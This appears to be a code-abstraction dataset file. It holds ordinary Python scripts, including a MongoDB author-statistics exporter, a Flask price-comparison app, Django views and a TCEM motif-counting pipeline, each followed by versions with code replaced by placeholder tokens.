"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n# Exports a CSV with top authors and their publications, to check a) disambiguation and b) h-index\n__author__ = \"\"\"Giovanni Colavizza\"\"\"\n\nimport codecs\n\n# MongoDB\nfrom pymongo import MongoClient\nfrom configparser import ConfigParser\nconfig_set = \"localhost\" # this is in localhost\nconfig = ConfigParser(allow_no_value=False)\nconfig.read(\"config/config.conf\")\nmongo_db = config.get(config_set, 'db-name')\nmongo_user = config.get(config_set, 'username')\nmongo_pwd = config.get(config_set, 'password')\nmongo_auth = config.get(config_set, 'auth-db')\nmongo_host = config.get(config_set, 'db-host')\nmongo_port = config.get(config_set, 'db-port')\nclient = MongoClient(mongo_host)\ndb = client[mongo_db]\ndb.authenticate(mongo_user, mongo_pwd, source=mongo_auth)\n\ncollection = db.stats_dev\ncollection_authors = db.authors_dev\n\nlimit = 10\n\n# get records\nauthors = list()\nfor record in collection_authors.find():\n\tauthors.append({\"tot_cit\":record[\"tot_cit\"],\"name\":record[\"name\"],\"n_pub\":len(record[\"publications\"]),\"publications\":record[\"publications\"],\"h_index\":record[\"h_index\"]})\n\nauthors = sorted(authors,key=lambda x:x[\"n_pub\"],reverse=True)\nwith codecs.open(\"exports/evaluation_authors.csv\",\"w\",encoding=\"utf8\") as f:\n\tf.write(\"id,name,h_index,tot_cit,publication_title,pub_year,n_cit\\n\")\n\tfor n,a in enumerate(authors[:limit]):\n\t\tfor p in a[\"publications\"]:\n\t\t\ttitle = p[\"title\"].replace('\"','')\n\t\t\ttitle = title.replace('\\n', ' ')\n\t\t\ttitle = title.replace('\\r', ' ')\n\t\t\tf.write(str(n)+\",\"+'\"'+a[\"name\"]+'\"'+\",\"+str(a[\"h_index\"])+\",\"+str(a[\"tot_cit\"])+\",\"+'\"'+title+'\"'+\",\"+str(p[\"year\"])+\",\"+str(p[\"n_cit\"])+\"\\n\")\n",
"__author__ = 'Giovanni Colavizza'\nimport codecs\nfrom pymongo import MongoClient\nfrom configparser import ConfigParser\nconfig_set = 'localhost'\nconfig = ConfigParser(allow_no_value=False)\nconfig.read('config/config.conf')\nmongo_db = config.get(config_set, 'db-name')\nmongo_user = config.get(config_set, 'username')\nmongo_pwd = config.get(config_set, 'password')\nmongo_auth = config.get(config_set, 'auth-db')\nmongo_host = config.get(config_set, 'db-host')\nmongo_port = config.get(config_set, 'db-port')\nclient = MongoClient(mongo_host)\ndb = client[mongo_db]\ndb.authenticate(mongo_user, mongo_pwd, source=mongo_auth)\ncollection = db.stats_dev\ncollection_authors = db.authors_dev\nlimit = 10\nauthors = list()\nfor record in collection_authors.find():\n authors.append({'tot_cit': record['tot_cit'], 'name': record['name'],\n 'n_pub': len(record['publications']), 'publications': record[\n 'publications'], 'h_index': record['h_index']})\nauthors = sorted(authors, key=lambda x: x['n_pub'], reverse=True)\nwith codecs.open('exports/evaluation_authors.csv', 'w', encoding='utf8') as f:\n f.write('id,name,h_index,tot_cit,publication_title,pub_year,n_cit\\n')\n for n, a in enumerate(authors[:limit]):\n for p in a['publications']:\n title = p['title'].replace('\"', '')\n title = title.replace('\\n', ' ')\n title = title.replace('\\r', ' ')\n f.write(str(n) + ',' + '\"' + a['name'] + '\"' + ',' + str(a[\n 'h_index']) + ',' + str(a['tot_cit']) + ',' + '\"' + title +\n '\"' + ',' + str(p['year']) + ',' + str(p['n_cit']) + '\\n')\n",
"__author__ = 'Giovanni Colavizza'\n<import token>\nconfig_set = 'localhost'\nconfig = ConfigParser(allow_no_value=False)\nconfig.read('config/config.conf')\nmongo_db = config.get(config_set, 'db-name')\nmongo_user = config.get(config_set, 'username')\nmongo_pwd = config.get(config_set, 'password')\nmongo_auth = config.get(config_set, 'auth-db')\nmongo_host = config.get(config_set, 'db-host')\nmongo_port = config.get(config_set, 'db-port')\nclient = MongoClient(mongo_host)\ndb = client[mongo_db]\ndb.authenticate(mongo_user, mongo_pwd, source=mongo_auth)\ncollection = db.stats_dev\ncollection_authors = db.authors_dev\nlimit = 10\nauthors = list()\nfor record in collection_authors.find():\n authors.append({'tot_cit': record['tot_cit'], 'name': record['name'],\n 'n_pub': len(record['publications']), 'publications': record[\n 'publications'], 'h_index': record['h_index']})\nauthors = sorted(authors, key=lambda x: x['n_pub'], reverse=True)\nwith codecs.open('exports/evaluation_authors.csv', 'w', encoding='utf8') as f:\n f.write('id,name,h_index,tot_cit,publication_title,pub_year,n_cit\\n')\n for n, a in enumerate(authors[:limit]):\n for p in a['publications']:\n title = p['title'].replace('\"', '')\n title = title.replace('\\n', ' ')\n title = title.replace('\\r', ' ')\n f.write(str(n) + ',' + '\"' + a['name'] + '\"' + ',' + str(a[\n 'h_index']) + ',' + str(a['tot_cit']) + ',' + '\"' + title +\n '\"' + ',' + str(p['year']) + ',' + str(p['n_cit']) + '\\n')\n",
"<assignment token>\n<import token>\n<assignment token>\nconfig.read('config/config.conf')\n<assignment token>\ndb.authenticate(mongo_user, mongo_pwd, source=mongo_auth)\n<assignment token>\nfor record in collection_authors.find():\n authors.append({'tot_cit': record['tot_cit'], 'name': record['name'],\n 'n_pub': len(record['publications']), 'publications': record[\n 'publications'], 'h_index': record['h_index']})\n<assignment token>\nwith codecs.open('exports/evaluation_authors.csv', 'w', encoding='utf8') as f:\n f.write('id,name,h_index,tot_cit,publication_title,pub_year,n_cit\\n')\n for n, a in enumerate(authors[:limit]):\n for p in a['publications']:\n title = p['title'].replace('\"', '')\n title = title.replace('\\n', ' ')\n title = title.replace('\\r', ' ')\n f.write(str(n) + ',' + '\"' + a['name'] + '\"' + ',' + str(a[\n 'h_index']) + ',' + str(a['tot_cit']) + ',' + '\"' + title +\n '\"' + ',' + str(p['year']) + ',' + str(p['n_cit']) + '\\n')\n",
"<assignment token>\n<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,806 | 97ce53a4c5995339469d956011be6e466acc49a9 | #coding=utf-8
import os,sys,time
def start3CD():
print(u'尝试关闭已经开启的3CD')
os.system('taskkill -f -im 3CDaemon.EXE')
print(u'当前运行路径:'+os.getcwd())
os.system('.\\3cd\\3CDaemon.EXE')
if __name__=='__main__':
start3CD() | [
"#coding=utf-8 \nimport os,sys,time\ndef start3CD():\n print(u'尝试关闭已经开启的3CD')\n os.system('taskkill -f -im 3CDaemon.EXE')\n print(u'当前运行路径:'+os.getcwd())\n os.system('.\\\\3cd\\\\3CDaemon.EXE')\nif __name__=='__main__':\n start3CD()",
"import os, sys, time\n\n\ndef start3CD():\n print(u'尝试关闭已经开启的3CD')\n os.system('taskkill -f -im 3CDaemon.EXE')\n print(u'当前运行路径:' + os.getcwd())\n os.system('.\\\\3cd\\\\3CDaemon.EXE')\n\n\nif __name__ == '__main__':\n start3CD()\n",
"<import token>\n\n\ndef start3CD():\n print(u'尝试关闭已经开启的3CD')\n os.system('taskkill -f -im 3CDaemon.EXE')\n print(u'当前运行路径:' + os.getcwd())\n os.system('.\\\\3cd\\\\3CDaemon.EXE')\n\n\nif __name__ == '__main__':\n start3CD()\n",
"<import token>\n\n\ndef start3CD():\n print(u'尝试关闭已经开启的3CD')\n os.system('taskkill -f -im 3CDaemon.EXE')\n print(u'当前运行路径:' + os.getcwd())\n os.system('.\\\\3cd\\\\3CDaemon.EXE')\n\n\n<code token>\n",
"<import token>\n<function token>\n<code token>\n"
] | false |
99,807 | 5f636b85df78c497647d49e9464ebcf9ebe1a4f9 | from flask import Flask, render_template, request
import datetime
import pandas as pd
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'scraper'))
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'data_handling'))
from scraper import *
from data_management import SearchResult, TransformDf2Html
from site_language import *
app = Flask(__name__)
# global definitions
nav_lang = {}
country_code = {}
sterm = ''
sort_type = 'price'
prod_collect = []
df = SearchResult(prod_collect)
@app.route('/', methods=['GET'])
def index():
global nav_lang
global country_code
global error_lang
global prod_collect
country_code = request.args.get('country', 'UK')
prod_collect = [] # if there was something in it, clear it
return(render_template('index.html', lang=index_search_lang[country_code], nav_lang=navbar_lang[country_code], err_lang=error_lang[country_code]))
@app.route('/results', methods=['POST'])
def results():
global nav_lang
global country_code
global error_lang
global results_lang
global sterm
global sort_type
global prod_collect
global df
sterm = request.form.get('term', sterm)
stype = request.form.get('sort_type', sort_type)
if sterm == '':
return(render_template('error.html', err_lang=error_lang[country_code], nav_lang=navbar_lang[country_code]))
store_list = init_stores(STORE_DICT[country_code])
if prod_collect == []:
for st in store_list:
class2call = STORE_MAP[country_code].get(st.name)
prod_info = class2call(sterm, st)
prod_info.start_collecting_data()
prod_collect.extend(prod_info._items)
df = SearchResult(prod_collect)
transdf = TransformDf2Html(df.df[['store_name', 'link', 'price', 'unit price', 'promotion']])
html_return = transdf.df2html_table(id='myTable', table_class='table table-hover', header_class='thead-dark')
else:
# import pdb
# pdb.set_trace()
prod_collect = df.sort_df(byWhat=stype)
return(render_template('results.html', sterm=prod_collect, nav_lang=navbar_lang[country_code], result_lan=results_lang[country_code]))
if __name__ == '__main__':
app.run(debug = True)
| [
"from flask import Flask, render_template, request\nimport datetime\nimport pandas as pd\n\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'scraper'))\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'data_handling'))\n\nfrom scraper import *\nfrom data_management import SearchResult, TransformDf2Html\nfrom site_language import *\napp = Flask(__name__)\n\n# global definitions\nnav_lang = {}\ncountry_code = {}\nsterm = ''\nsort_type = 'price'\nprod_collect = []\ndf = SearchResult(prod_collect)\n\n\[email protected]('/', methods=['GET'])\ndef index():\n global nav_lang\n global country_code\n global error_lang\n global prod_collect\n country_code = request.args.get('country', 'UK')\n prod_collect = [] # if there was something in it, clear it\n return(render_template('index.html', lang=index_search_lang[country_code], nav_lang=navbar_lang[country_code], err_lang=error_lang[country_code]))\n\[email protected]('/results', methods=['POST'])\ndef results():\n global nav_lang\n global country_code\n global error_lang\n global results_lang\n global sterm\n global sort_type\n global prod_collect\n global df\n\n sterm = request.form.get('term', sterm)\n stype = request.form.get('sort_type', sort_type)\n if sterm == '':\n return(render_template('error.html', err_lang=error_lang[country_code], nav_lang=navbar_lang[country_code]))\n store_list = init_stores(STORE_DICT[country_code])\n if prod_collect == []:\n for st in store_list:\n class2call = STORE_MAP[country_code].get(st.name)\n prod_info = class2call(sterm, st)\n prod_info.start_collecting_data()\n prod_collect.extend(prod_info._items)\n df = SearchResult(prod_collect)\n transdf = TransformDf2Html(df.df[['store_name', 'link', 'price', 'unit price', 'promotion']])\n html_return = transdf.df2html_table(id='myTable', table_class='table table-hover', header_class='thead-dark')\n else:\n # import pdb\n # pdb.set_trace()\n\n prod_collect = df.sort_df(byWhat=stype)\n\n\n return(render_template('results.html', sterm=prod_collect, nav_lang=navbar_lang[country_code], result_lan=results_lang[country_code]))\n\nif __name__ == '__main__':\n app.run(debug = True)\n",
"from flask import Flask, render_template, request\nimport datetime\nimport pandas as pd\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'scraper'))\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'data_handling'))\nfrom scraper import *\nfrom data_management import SearchResult, TransformDf2Html\nfrom site_language import *\napp = Flask(__name__)\nnav_lang = {}\ncountry_code = {}\nsterm = ''\nsort_type = 'price'\nprod_collect = []\ndf = SearchResult(prod_collect)\n\n\[email protected]('/', methods=['GET'])\ndef index():\n global nav_lang\n global country_code\n global error_lang\n global prod_collect\n country_code = request.args.get('country', 'UK')\n prod_collect = []\n return render_template('index.html', lang=index_search_lang[\n country_code], nav_lang=navbar_lang[country_code], err_lang=\n error_lang[country_code])\n\n\[email protected]('/results', methods=['POST'])\ndef results():\n global nav_lang\n global country_code\n global error_lang\n global results_lang\n global sterm\n global sort_type\n global prod_collect\n global df\n sterm = request.form.get('term', sterm)\n stype = request.form.get('sort_type', sort_type)\n if sterm == '':\n return render_template('error.html', err_lang=error_lang[\n country_code], nav_lang=navbar_lang[country_code])\n store_list = init_stores(STORE_DICT[country_code])\n if prod_collect == []:\n for st in store_list:\n class2call = STORE_MAP[country_code].get(st.name)\n prod_info = class2call(sterm, st)\n prod_info.start_collecting_data()\n prod_collect.extend(prod_info._items)\n df = SearchResult(prod_collect)\n transdf = TransformDf2Html(df.df[['store_name', 'link', 'price',\n 'unit price', 'promotion']])\n html_return = transdf.df2html_table(id='myTable', table_class=\n 'table table-hover', header_class='thead-dark')\n else:\n prod_collect = df.sort_df(byWhat=stype)\n return render_template('results.html', sterm=prod_collect, nav_lang=\n navbar_lang[country_code], result_lan=results_lang[country_code])\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"<import token>\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'scraper'))\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'data_handling'))\n<import token>\napp = Flask(__name__)\nnav_lang = {}\ncountry_code = {}\nsterm = ''\nsort_type = 'price'\nprod_collect = []\ndf = SearchResult(prod_collect)\n\n\[email protected]('/', methods=['GET'])\ndef index():\n global nav_lang\n global country_code\n global error_lang\n global prod_collect\n country_code = request.args.get('country', 'UK')\n prod_collect = []\n return render_template('index.html', lang=index_search_lang[\n country_code], nav_lang=navbar_lang[country_code], err_lang=\n error_lang[country_code])\n\n\[email protected]('/results', methods=['POST'])\ndef results():\n global nav_lang\n global country_code\n global error_lang\n global results_lang\n global sterm\n global sort_type\n global prod_collect\n global df\n sterm = request.form.get('term', sterm)\n stype = request.form.get('sort_type', sort_type)\n if sterm == '':\n return render_template('error.html', err_lang=error_lang[\n country_code], nav_lang=navbar_lang[country_code])\n store_list = init_stores(STORE_DICT[country_code])\n if prod_collect == []:\n for st in store_list:\n class2call = STORE_MAP[country_code].get(st.name)\n prod_info = class2call(sterm, st)\n prod_info.start_collecting_data()\n prod_collect.extend(prod_info._items)\n df = SearchResult(prod_collect)\n transdf = TransformDf2Html(df.df[['store_name', 'link', 'price',\n 'unit price', 'promotion']])\n html_return = transdf.df2html_table(id='myTable', table_class=\n 'table table-hover', header_class='thead-dark')\n else:\n prod_collect = df.sort_df(byWhat=stype)\n return render_template('results.html', sterm=prod_collect, nav_lang=\n navbar_lang[country_code], result_lan=results_lang[country_code])\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"<import token>\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'scraper'))\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'data_handling'))\n<import token>\n<assignment token>\n\n\[email protected]('/', methods=['GET'])\ndef index():\n global nav_lang\n global country_code\n global error_lang\n global prod_collect\n country_code = request.args.get('country', 'UK')\n prod_collect = []\n return render_template('index.html', lang=index_search_lang[\n country_code], nav_lang=navbar_lang[country_code], err_lang=\n error_lang[country_code])\n\n\[email protected]('/results', methods=['POST'])\ndef results():\n global nav_lang\n global country_code\n global error_lang\n global results_lang\n global sterm\n global sort_type\n global prod_collect\n global df\n sterm = request.form.get('term', sterm)\n stype = request.form.get('sort_type', sort_type)\n if sterm == '':\n return render_template('error.html', err_lang=error_lang[\n country_code], nav_lang=navbar_lang[country_code])\n store_list = init_stores(STORE_DICT[country_code])\n if prod_collect == []:\n for st in store_list:\n class2call = STORE_MAP[country_code].get(st.name)\n prod_info = class2call(sterm, st)\n prod_info.start_collecting_data()\n prod_collect.extend(prod_info._items)\n df = SearchResult(prod_collect)\n transdf = TransformDf2Html(df.df[['store_name', 'link', 'price',\n 'unit price', 'promotion']])\n html_return = transdf.df2html_table(id='myTable', table_class=\n 'table table-hover', header_class='thead-dark')\n else:\n prod_collect = df.sort_df(byWhat=stype)\n return render_template('results.html', sterm=prod_collect, nav_lang=\n navbar_lang[country_code], result_lan=results_lang[country_code])\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"<import token>\n<code token>\n<import token>\n<assignment token>\n\n\[email protected]('/', methods=['GET'])\ndef index():\n global nav_lang\n global country_code\n global error_lang\n global prod_collect\n country_code = request.args.get('country', 'UK')\n prod_collect = []\n return render_template('index.html', lang=index_search_lang[\n country_code], nav_lang=navbar_lang[country_code], err_lang=\n error_lang[country_code])\n\n\[email protected]('/results', methods=['POST'])\ndef results():\n global nav_lang\n global country_code\n global error_lang\n global results_lang\n global sterm\n global sort_type\n global prod_collect\n global df\n sterm = request.form.get('term', sterm)\n stype = request.form.get('sort_type', sort_type)\n if sterm == '':\n return render_template('error.html', err_lang=error_lang[\n country_code], nav_lang=navbar_lang[country_code])\n store_list = init_stores(STORE_DICT[country_code])\n if prod_collect == []:\n for st in store_list:\n class2call = STORE_MAP[country_code].get(st.name)\n prod_info = class2call(sterm, st)\n prod_info.start_collecting_data()\n prod_collect.extend(prod_info._items)\n df = SearchResult(prod_collect)\n transdf = TransformDf2Html(df.df[['store_name', 'link', 'price',\n 'unit price', 'promotion']])\n html_return = transdf.df2html_table(id='myTable', table_class=\n 'table table-hover', header_class='thead-dark')\n else:\n prod_collect = df.sort_df(byWhat=stype)\n return render_template('results.html', sterm=prod_collect, nav_lang=\n navbar_lang[country_code], result_lan=results_lang[country_code])\n\n\n<code token>\n",
"<import token>\n<code token>\n<import token>\n<assignment token>\n\n\[email protected]('/', methods=['GET'])\ndef index():\n global nav_lang\n global country_code\n global error_lang\n global prod_collect\n country_code = request.args.get('country', 'UK')\n prod_collect = []\n return render_template('index.html', lang=index_search_lang[\n country_code], nav_lang=navbar_lang[country_code], err_lang=\n error_lang[country_code])\n\n\n<function token>\n<code token>\n",
"<import token>\n<code token>\n<import token>\n<assignment token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,808 | 061b974da483c7ae05fae4156ebbcf80be0ac385 | from django.shortcuts import render, get_object_or_404
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, DetailView
from company.models import Profile
from make.models import Make
from series.models import Series
from accessories.models import Accessory
from products.models import Product
from productimages.models import ProductImage
from promos.models import Promo
class IndexPage(DetailView):
template_name = "index.html"
def get_object(self):
return get_object_or_404(Profile, id=1)
def get_context_data(self, **kwargs):
context = super(IndexPage, self).get_context_data(**kwargs)
context['make_list'] = Make.objects.all().order_by('name')
context['series_list'] = Series.objects.all().order_by('name')
context['brand_logo'] = self.object.logo
return context
| [
"from django.shortcuts import render, get_object_or_404\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.views.generic import ListView, DetailView\n\nfrom company.models import Profile\nfrom make.models import Make\nfrom series.models import Series\nfrom accessories.models import Accessory\nfrom products.models import Product\nfrom productimages.models import ProductImage\nfrom promos.models import Promo\n\n\nclass IndexPage(DetailView):\n template_name = \"index.html\"\n\n def get_object(self):\n return get_object_or_404(Profile, id=1)\n\n def get_context_data(self, **kwargs):\n context = super(IndexPage, self).get_context_data(**kwargs)\n context['make_list'] = Make.objects.all().order_by('name')\n context['series_list'] = Series.objects.all().order_by('name')\n context['brand_logo'] = self.object.logo\n return context\n",
"from django.shortcuts import render, get_object_or_404\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.views.generic import ListView, DetailView\nfrom company.models import Profile\nfrom make.models import Make\nfrom series.models import Series\nfrom accessories.models import Accessory\nfrom products.models import Product\nfrom productimages.models import ProductImage\nfrom promos.models import Promo\n\n\nclass IndexPage(DetailView):\n template_name = 'index.html'\n\n def get_object(self):\n return get_object_or_404(Profile, id=1)\n\n def get_context_data(self, **kwargs):\n context = super(IndexPage, self).get_context_data(**kwargs)\n context['make_list'] = Make.objects.all().order_by('name')\n context['series_list'] = Series.objects.all().order_by('name')\n context['brand_logo'] = self.object.logo\n return context\n",
"<import token>\n\n\nclass IndexPage(DetailView):\n template_name = 'index.html'\n\n def get_object(self):\n return get_object_or_404(Profile, id=1)\n\n def get_context_data(self, **kwargs):\n context = super(IndexPage, self).get_context_data(**kwargs)\n context['make_list'] = Make.objects.all().order_by('name')\n context['series_list'] = Series.objects.all().order_by('name')\n context['brand_logo'] = self.object.logo\n return context\n",
"<import token>\n\n\nclass IndexPage(DetailView):\n <assignment token>\n\n def get_object(self):\n return get_object_or_404(Profile, id=1)\n\n def get_context_data(self, **kwargs):\n context = super(IndexPage, self).get_context_data(**kwargs)\n context['make_list'] = Make.objects.all().order_by('name')\n context['series_list'] = Series.objects.all().order_by('name')\n context['brand_logo'] = self.object.logo\n return context\n",
"<import token>\n\n\nclass IndexPage(DetailView):\n <assignment token>\n <function token>\n\n def get_context_data(self, **kwargs):\n context = super(IndexPage, self).get_context_data(**kwargs)\n context['make_list'] = Make.objects.all().order_by('name')\n context['series_list'] = Series.objects.all().order_by('name')\n context['brand_logo'] = self.object.logo\n return context\n",
"<import token>\n\n\nclass IndexPage(DetailView):\n <assignment token>\n <function token>\n <function token>\n",
"<import token>\n<class token>\n"
] | false |
99,809 | 58e1a7d4730f07ed536368e4627de0f001a89455 | from django.views.generic import TemplateView, DetailView
from django.contrib.auth.models import User
class IndexView(TemplateView):
template_name = "transcendence/index.html"
class UserInfoView(DetailView):
template_name = "transcendence/user_info.html"
model = User
pk_url_kwarg = 'user_id'
| [
"from django.views.generic import TemplateView, DetailView\nfrom django.contrib.auth.models import User\n\n\nclass IndexView(TemplateView):\n template_name = \"transcendence/index.html\"\n\n\nclass UserInfoView(DetailView):\n template_name = \"transcendence/user_info.html\"\n model = User\n pk_url_kwarg = 'user_id'\n",
"from django.views.generic import TemplateView, DetailView\nfrom django.contrib.auth.models import User\n\n\nclass IndexView(TemplateView):\n template_name = 'transcendence/index.html'\n\n\nclass UserInfoView(DetailView):\n template_name = 'transcendence/user_info.html'\n model = User\n pk_url_kwarg = 'user_id'\n",
"<import token>\n\n\nclass IndexView(TemplateView):\n template_name = 'transcendence/index.html'\n\n\nclass UserInfoView(DetailView):\n template_name = 'transcendence/user_info.html'\n model = User\n pk_url_kwarg = 'user_id'\n",
"<import token>\n\n\nclass IndexView(TemplateView):\n <assignment token>\n\n\nclass UserInfoView(DetailView):\n template_name = 'transcendence/user_info.html'\n model = User\n pk_url_kwarg = 'user_id'\n",
"<import token>\n<class token>\n\n\nclass UserInfoView(DetailView):\n template_name = 'transcendence/user_info.html'\n model = User\n pk_url_kwarg = 'user_id'\n",
"<import token>\n<class token>\n\n\nclass UserInfoView(DetailView):\n <assignment token>\n <assignment token>\n <assignment token>\n",
"<import token>\n<class token>\n<class token>\n"
] | false |
99,810 | d4353d484da7eb1c228220a403269e9be9d6612f |
import luigi
import logging
import subprocess
import logging
import pandas as pd
import sqlite3
from os.path import join, dirname, basename
from .mixcr import MixcrClones
from .tcem_aa_db import TcemNrAaDb
from ....pipeline.utils.cap_task import CapTask
from ....pipeline.config import PipelineConfig
logger = logging.getLogger('tcems')
def countit(objs):
"""Return a dict with counts for each item in a list."""
out = {}
for el in objs:
out[el] = 1 + out.get(el, 0)
out = {k: v for k, v in out.items()}
return out
def get_binding_motifs(seq):
"""Return a dict of dicts with counts for different TCEM motifs."""
out = {'type_1': [], 'type_2a': [], 'type_2b': []}
for i in range(len(seq) - 9 + 1):
kmer = seq[i:i + 9]
out['type_1'].append(kmer[3:8])
for i in range(len(seq) - 15 + 1):
kmer = seq[i:i + 15]
tail = kmer[5] + kmer[7] + kmer[9] + kmer[10]
out['type_2a'].append(kmer[4] + tail)
out['type_2b'].append(kmer[2] + tail)
counted = {k: countit(v) for k, v in out.items()}
return counted
def parse_mixcr_table(filepath):
"""Return counts of TCEMs for a set of CDR3 sequences."""
tbl = pd.read_csv(filepath, sep='\t')
out = {}
for _, row in tbl.iterrows():
motifs = get_binding_motifs(row['aaSeqImputedCDR3'])
for kind, motif_counts in motifs.items():
for motif, count in motif_counts.items():
for mykind in [kind, 'all_types']:
key = (mykind, motif)
if key not in out:
out[key] = {
'num_unique_seqs': 0,
'num_clones': 0,
'num_unique_occurences': 0,
'num_clonal_occurences': 0,
}
out[key]['num_unique_seqs'] += 1
out[key]['num_clones'] += row['cloneCount']
out[key]['num_unique_occurences'] += count
out[key]['num_clonal_occurences'] += count * row['cloneCount']
return out
class TcemRepertoire(CapTask):
module_description = """
This module identifies repertoires of TCEMs in VDJ clonal sequences.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.mixcr = MixcrClones.from_cap_task(self)
self.config = PipelineConfig(self.config_filename)
def requires(self):
return self.mixcr
@classmethod
def version(cls):
return 'v0.1.1'
def tool_version(self):
return self.version()
@classmethod
def dependencies(cls):
return [MixcrClones]
@classmethod
def _module_name(cls):
return 'tcems::tcem_repertoire'
def output(self):
out = {
'tcem_counts': self.get_target(f'tcem_repertoire', 'csv'),
}
return out
@property
def tcem_counts_path(self):
return self.output()[f'tcem_counts'].path
def _run(self):
motif_counts = parse_mixcr_table(self.mixcr.igh_path)
out = pd.DataFrame.from_dict(motif_counts, orient='index')
out.to_csv(self.tcem_counts_path)
class AnnotatedTcemRepertoire(CapTask):
module_description = """
This module identifies repertoires of TCEMs in VDJ clonal sequences.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.repetoire = TcemRepertoire.from_cap_task(self)
self.db = TcemNrAaDb.from_cap_task(self)
self.config = PipelineConfig(self.config_filename)
def requires(self):
return self.repetoire
@classmethod
def version(cls):
return 'v0.1.0'
def tool_version(self):
return self.version()
@classmethod
def dependencies(cls):
return [TcemRepertoire]
@classmethod
def _module_name(cls):
return 'tcems::annotated_tcem_repertoire'
def output(self):
out = {
'tcem_annotations': self.get_target(f'annotated_tcem_repertoire', 'csv'),
}
return out
@property
def tcem_annotation_path(self):
return self.output()[f'tcem_annotations'].path
def _run(self):
with sqlite3.connect(self.db.tcem_index) as conn:
c = conn.cursor()
rep = pd.read_csv(self.repetoire.tcem_counts_path)
kmers = rep.iloc[:, 1].unique()
tbl = {}
for kmer in kmers:
tbl[kmer] = {}
cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = "{kmer}"'
for taxon in c.execute(cmd):
tbl[kmer][taxon] = 1
tbl = pd.DataFrame.from_dict(tbl, orient='index')
tbl.to_csv(self.tcem_annotation_path)
| [
"\nimport luigi\nimport logging\nimport subprocess\nimport logging\nimport pandas as pd\nimport sqlite3\nfrom os.path import join, dirname, basename\n\nfrom .mixcr import MixcrClones\nfrom .tcem_aa_db import TcemNrAaDb\n\nfrom ....pipeline.utils.cap_task import CapTask\nfrom ....pipeline.config import PipelineConfig\n\n\nlogger = logging.getLogger('tcems')\n\n\ndef countit(objs):\n \"\"\"Return a dict with counts for each item in a list.\"\"\"\n out = {}\n for el in objs:\n out[el] = 1 + out.get(el, 0)\n out = {k: v for k, v in out.items()}\n return out\n\n\ndef get_binding_motifs(seq):\n \"\"\"Return a dict of dicts with counts for different TCEM motifs.\"\"\"\n out = {'type_1': [], 'type_2a': [], 'type_2b': []}\n for i in range(len(seq) - 9 + 1):\n kmer = seq[i:i + 9]\n out['type_1'].append(kmer[3:8])\n for i in range(len(seq) - 15 + 1):\n kmer = seq[i:i + 15]\n tail = kmer[5] + kmer[7] + kmer[9] + kmer[10]\n out['type_2a'].append(kmer[4] + tail)\n out['type_2b'].append(kmer[2] + tail)\n counted = {k: countit(v) for k, v in out.items()}\n return counted\n\n\ndef parse_mixcr_table(filepath):\n \"\"\"Return counts of TCEMs for a set of CDR3 sequences.\"\"\"\n tbl = pd.read_csv(filepath, sep='\\t')\n out = {}\n for _, row in tbl.iterrows():\n motifs = get_binding_motifs(row['aaSeqImputedCDR3'])\n for kind, motif_counts in motifs.items():\n for motif, count in motif_counts.items():\n for mykind in [kind, 'all_types']:\n key = (mykind, motif)\n if key not in out:\n out[key] = {\n 'num_unique_seqs': 0,\n 'num_clones': 0,\n 'num_unique_occurences': 0,\n 'num_clonal_occurences': 0,\n }\n out[key]['num_unique_seqs'] += 1\n out[key]['num_clones'] += row['cloneCount']\n out[key]['num_unique_occurences'] += count\n out[key]['num_clonal_occurences'] += count * row['cloneCount']\n return out\n\n\nclass TcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {\n 'tcem_counts': self.get_target(f'tcem_repertoire', 'csv'),\n }\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {\n 'tcem_annotations': self.get_target(f'annotated_tcem_repertoire', 'csv'),\n }\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = 